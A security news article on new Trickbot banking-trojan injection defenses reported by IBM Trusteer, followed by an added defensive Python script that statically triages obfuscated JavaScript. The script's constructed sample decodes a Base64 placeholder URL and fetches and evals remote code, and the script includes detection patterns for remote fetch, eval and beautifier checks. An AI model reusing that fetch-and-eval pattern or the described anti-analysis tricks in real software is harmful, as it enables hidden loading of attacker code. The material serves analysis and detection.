Trickbot Injections Get Harder to Detect & Analyze

Published: 23/11/2024   Category: security



The authors of the infamous malware family have added measures for better protecting malicious code injections against inspection and research.



The authors of the Trickbot Trojan have added multiple layers of defenses around the malware to make it harder for defenders to detect and analyze the injections it uses during malicious operations.
The improvements coincide with escalating activity around the malware and appear designed for attacks in which Trickbot is used to conduct online banking fraud — the purpose the tool was originally built for before it was repurposed as a malware distribution vehicle.
Researchers from IBM Trusteer analyzed the most recent code injections that Trickbot uses while stealing information for banking fraud. They found new tweaks of the kind the malware's operators have been making since it was first released in 2016.
The updates include a new server-side injection mechanism; encrypted communications with the command-and-control (C2) server for fetching injections; an anti-debugging feature; and new ways to obfuscate and hide the inject code. Limor Kessem, executive security adviser at IBM, describes the changes as part of an ongoing effort that Trickbot's developers have been putting into keeping the malware one step ahead of security researchers and detection tools.
"Malware that's designed to get through security controls, as Trickbot is, has to be constantly updated," Kessem says. "Things change [at] the code level, resources are encoded/encrypted and obfuscated. These efforts are there to prevent detection and hinder analysis as much as possible."
Trickbot emerged not long after Russian law enforcement authorities arrested the operators of Dyre, a banking Trojan used in attacks that ended up costing millions of dollars in losses for banks such as Chase and Bank of America. The highly modular tool started off as a banking Trojan like Dyre and is designed to steal information that would allow attackers to access and steal money from a victim's bank account. Over the years, Trickbot also morphed into a vehicle for distributing other malware, including ransomware and other banking Trojans, such as Emotet.
The operators of Trickbot have so far been largely impervious to takedown attempts. This includes one attempt in October 2020 in which researchers at Microsoft, ESET, and other security vendors worked with the Financial Services Information Sharing and Analysis Center to disrupt Trickbot's C2 infrastructure. At the time, the malware had infected more than a million systems in 12 countries. Though the takedown effort resulted in some 19 different Trickbot C2 servers at different locations being disconnected, it had only a moderate impact at best on the malware operation. Details from an indictment last year against a Latvian developer of the malware described the core Trickbot group as made up of some 20 individuals, including software developers, malware experts, money mules, and programmers.
Extra Protections
IBM's analysis of the latest version of Trickbot shows that the operators have added extra protections to the code injections that are used in real time when a user on an infected machine attempts to access their bank account online. The injections are designed to modify information going out from the user's browser on the fly, before it reaches the bank's server.
"One of the ways cybercriminals trick victims into divulging sensitive information is by using customized Web-injection flows that mimic what they would normally expect when interacting online with their bank," Kessem says. "They can go all the way to creating a fake banking site on their servers and take victims there instead," she says. "In other cases, they create a more robust scheme that involves humans on the other end, as was the case with Dyre attackers."
IBM's analysis shows that instead of fetching injection code from configuration files stored locally on a compromised system, Trickbot's operators have begun injecting the code in real time from their own server. This kind of server-side injection is easier for attackers to manipulate in real time than locally stored injections. It also makes it much harder for defenders to understand what malicious activity might be launched against a particular target, IBM said.
A JavaScript downloader that Trickbot uses has also been tweaked so it now uses the HTTPS protocol to securely fetch Web injections from an attacker-controlled inject-server. The injections are tailored for specific bank URLs and are designed to trick users into divulging information the attackers can use to steal money from an online bank account.
As a further measure, Trickbot's authors have added an anti-debugging feature to the malware's JavaScript code. The anti-debugging feature is designed to detect the code beautification (reformatting minified or obfuscated code for readability) that security researchers perform when analyzing suspicious code. When Trickbot's new anti-debugging mechanism detects any attempt at such code beautifying, it immediately triggers a process that results in memory getting overloaded and the browser crashing, IBM said.
The injected code itself is also heavily obfuscated. It is encoded with Base64 and uses a variety of tricks, such as making code unreadable to the human eye, hiding information about code execution, and representing numbers and variables in a deliberately complex way. Knowing about these techniques helps defenders know what to expect, Kessem says, and to unpack the challenging parts so they can analyze the malware and adjust controls.
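The following is an added example of the defender-side triage the preceding paragraphs point to; it is not IBM Trusteer's tooling and contains no Trickbot code. It decodes Base64 string literals in a JavaScript sample to recover hidden values such as a remote inject-server address, and flags textual hallmarks that correspond to the behaviours described above: fetching injections from a remote server over HTTPS, a script inspecting its own source text (one common way a script can notice it has been beautified), and executing fetched text as code. The sample script, the placeholder URL `inject-server.example`, the stand-in function `crashTab()` and the indicator regexes are all constructed for this example.

```python
"""Static triage of an obfuscated browser-side injection script.

Added example: not IBM Trusteer's tooling and not Trickbot code. It
decodes Base64 string literals to recover hidden values such as an
inject-server URL, and flags hallmarks like a remote fetch of injections,
a check on a function's own source text (one way a script can notice it
has been beautified), and runtime evaluation of fetched code. The sample
script, the placeholder URL and the indicator patterns are constructed.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Constructed placeholder; not a real inject-server address.
INJECT_URL = "https://inject-server.example/inj/bank.js"
ENCODED_URL = base64.b64encode(INJECT_URL.encode()).decode()

# Constructed sample that only mimics the structure the article describes.
# crashTab() is a hypothetical stand-in for the "overload memory" reaction.
SAMPLE_JS = (
    f'var c = atob("{ENCODED_URL}");\n'
    'if ((function(){}).toString().indexOf("\\n") !== -1) { crashTab(); }\n'
    "fetch(c).then(r => r.text()).then(eval);\n"
)

# Quoted string literals made only of Base64 alphabet characters.
B64_LITERAL = re.compile(r'''["']([A-Za-z0-9+/]{16,}={0,2})["']''')
URL_IN_TEXT = re.compile(r"https?://[^\s\"'<>]+")

# Textual hallmarks (assumed patterns, chosen for this example).
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    # Script inspects a function's own source text, e.g. for the newlines
    # a beautifier adds to one-line minified code.
    "beautifier_check": re.compile(
        r"toString\(\)\s*\.\s*(?:indexOf|includes|search|match)\s*\("
    ),
    # Injections are fetched from a remote server at run time.
    "remote_fetch": re.compile(r"\b(?:fetch|XMLHttpRequest)\b"),
    # Fetched text is executed as code.
    "runtime_eval": re.compile(r"\beval\b|new\s+Function\s*\("),
}


def decode_base64_safe(literal: str) -> Optional[str]:
    """Return the decoded text, or None if the literal is not valid
    Base64 or does not decode to printable UTF-8 text."""
    try:
        raw = base64.b64decode(literal, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def extract_decoded_strings(js: str) -> List[str]:
    """Decode every Base64-looking string literal that yields readable text."""
    found: List[str] = []
    for literal in B64_LITERAL.findall(js):
        text = decode_base64_safe(literal)
        if text is not None and text not in found:
            found.append(text)
    return found


def triage(js: str) -> Dict[str, object]:
    """Summarise what a script hides and which hallmarks it shows."""
    decoded = extract_decoded_strings(js)
    urls: List[str] = []
    for text in decoded:  # URLs that were hidden behind Base64
        urls.extend(URL_IN_TEXT.findall(text))
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(js))
    return {
        "decoded_strings": decoded,
        "remote_urls": urls,
        "indicators": hits,
        "score": len(hits),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_JS).items():
        print(f"{key}: {value}")
```

Running the module on the constructed sample recovers the Base64-hidden inject-server URL and reports all three hallmarks. The decoder deliberately rejects literals that are not valid Base64 or do not decode to printable text, so long alphanumeric identifiers that merely look like Base64 are not misreported as hidden strings; the recovered URLs are the values worth feeding into proxy or DNS blocklists, while the indicator hits are a starting point for manual analysis rather than a verdict on their own.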
